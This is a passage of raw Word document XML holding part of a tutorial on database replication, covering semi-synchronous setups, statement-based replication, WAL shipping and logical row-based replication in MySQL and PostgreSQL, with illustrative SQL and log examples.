      </w:r>
    </w:p>
    <w:p w14:paraId="1E0E9FFB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The practical compromise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C11DD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E60F2B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Write must be acknowledged by primary + AT LEAST ONE replica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0D431" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Other replicas receive it asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1139211D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="57B809AF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>MySQL semi-sync:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A586899" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Primary writes → waits for 1 replica ACK → confirms to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB1903F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Other replicas catch up asynchronously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F7927D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="6EBB7177" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>PostgreSQL synchronous_standby_names:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FCDAF2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  synchronous_standby_names = 'FIRST 1 (replica1, replica2, replica3)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6831EF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Wait for the FIRST of the listed replicas to ACK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A506441" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792307EC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1509"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>At least 2 copies exist before confirming (primary + 1 replica).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3E1BE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1509"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>If primary dies, at least one replica has ALL committed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A281D59" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1509"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Write latency = max(primary write, fastest replica ACK) — not the slowest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFACBAD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1509"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>If the synchronous replica dies → system can fall back to another replica as synchronous target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63649EB6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is the most common production configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2629976B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1510"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>1 synchronous replica (same datacenter, fast ACK — adds 1–2ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A29B8B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1510"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>1–2 asynchronous replicas (cross-region, for DR — doesn't affect write latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D35FBC4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="279D7102">
          <v:rect id="_x0000_i5641" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0840A1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Replication Mechanisms — How Data Gets to Replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A443B2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Statement-Based Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C5CA05" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Primary logs the actual SQL statements and sends them to replicas. Replicas re-execute the same statements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE41128" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54732896" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary executes: INSERT INTO orders(id, amount) VALUES (42, 100.00);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E8E279" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary logs: "INSERT INTO orders(id, amount) VALUES (42, 100.00);"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61452FF2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica receives: "INSERT INTO orders(id, amount) VALUES (42, 100.00);"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364D37A6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica executes: INSERT INTO orders(id, amount) VALUES (42, 100.00);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5CA1E3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBB5F5A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1511"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Compact log (SQL text is small compared to row data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E45CA07" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1511"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Human-readable (can inspect the replication stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76642935" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1511"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Version-independent (replicas can run different versions if SQL is compatible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8DDF12" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problems (why it's rarely used today):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB3A975" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6378A0FA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Non-deterministic functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C48EDB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  INSERT INTO events(id, timestamp) VALUES (1, NOW());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A940F4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Primary executes NOW() at 14:30:01.123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782D7880" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Replica executes NOW() at 14:30:01.456 (different result!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0374B89F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="2FDB5CFE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Similarly: RAND(), UUID(), auto-increment (with triggers), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8B3CB7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="31A4F40D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Side effects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203359B6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  UPDATE accounts SET balance = balance * 1.01 WHERE balance &gt; 1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D055D6D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  If row order differs between primary and replica → different results for concurrent updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DE154A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="3FE36092" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Triggers and stored procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FC8CB9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  May behave differently on replica (different state, timing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AF4ADB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> MySQL (legacy mode), rarely the default today.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D78F7F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Write-Ahead Log (WAL) Shipping — Physical Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A8D01C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Primary sends its raw WAL (write-ahead log) bytes to replicas. Replicas replay the exact same physical changes to their storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154474E7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E457444" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary WAL record:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498A574E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  "Page 4721, offset 128: write bytes [0x48 0x65 0x6C 0x6C 0x6F]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4415E3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="5E089B67" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica receives the WAL record and applies the SAME physical modification to its data files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3E9484" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PostgreSQL streaming replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD4341D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E02429" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>1. Primary writes WAL to local WAL segment files (16 MB each).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D81AD3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>2. WAL sender process streams WAL records to connected replicas over TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B89FA01" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>3. Replica's WAL receiver writes records to its local WAL files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4748BAAD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>4. Replica's recovery process replays WAL records to update data pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E4F2C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A01A09" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1512"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Exactly replicates the primary's state (byte-for-byte identical storage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441396F2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1512"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>No ambiguity or non-determinism (physical changes are deterministic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E92AD49" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1512"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Efficient (WAL is already being written for crash recovery — replication adds minimal overhead).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0EAE86" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4A1ED2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1513"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Version coupling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Primary and replica MUST run the same database version (same page format, same WAL format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D5DD2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1513"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No selective replication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Cannot replicate only certain tables (it's all-or-nothing at the physical level).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3254FAC3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1513"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replica is read-only:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Cannot modify data on the replica (would conflict with WAL replay).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0124CA88" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> PostgreSQL (primary replication method), SQL Server (log shipping).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7A8604" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Logical Replication (Row-Based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267433A7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Primary decodes its WAL into logical changes (INSERT row, UPDATE row, DELETE row) and sends those logical events to replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE57C5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAA130F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary WAL (physical): "Page 4721, offset 128: write 42 bytes..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A9EEE8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Decoded to logical: INSERT INTO users(id, name, email) VALUES (42, 'Alice', 'alice@ex.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693F068E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="31EB7258" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Replica receives: {table: "users", op: "INSERT", row: {id: 42, name: "Alice", email: "alice@ex.com"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308E5E01" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica applies: INSERT INTO its local table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B92381" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MySQL binlog (row-based format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3993EF38" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4D0BA3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Event: WRITE_ROWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C45351" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Table: orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD21DD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Row image (before): NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC91A83" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
